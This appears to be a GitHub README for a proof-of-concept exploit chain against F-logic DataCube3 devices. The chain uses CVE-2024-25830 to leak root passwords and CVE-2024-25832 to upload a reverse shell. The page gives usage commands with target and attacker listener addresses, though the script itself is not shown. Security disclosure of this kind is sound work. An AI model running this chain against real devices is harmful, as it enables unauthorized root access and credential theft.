PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3

0xNslabs/CVE-2024-25832-PoC


CVE-2024-25830 and CVE-2024-25832 - DataCube3 Improper Access Control and Unrestricted File Upload.

Overview

This repository features a Proof of Concept (PoC) for a two-step exploit chain targeting DataCube3 devices. It combines CVE-2024-25830 (Improper Access Control) to extract root passwords and CVE-2024-25832 (Unrestricted File Upload) to deploy a reverse shell script. This PoC complements the detailed vulnerability analysis in the blog post "DataCube3 Vulnerability Report."

Affected versions

All F-logic DataCube3 devices version 1.0.

PoC Script Usage

# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

Video Proof of Concept

Script PoC CVE-2024-25832

Datacube3 Exploit chain

Note

FOR EDUCATIONAL PURPOSES ONLY.
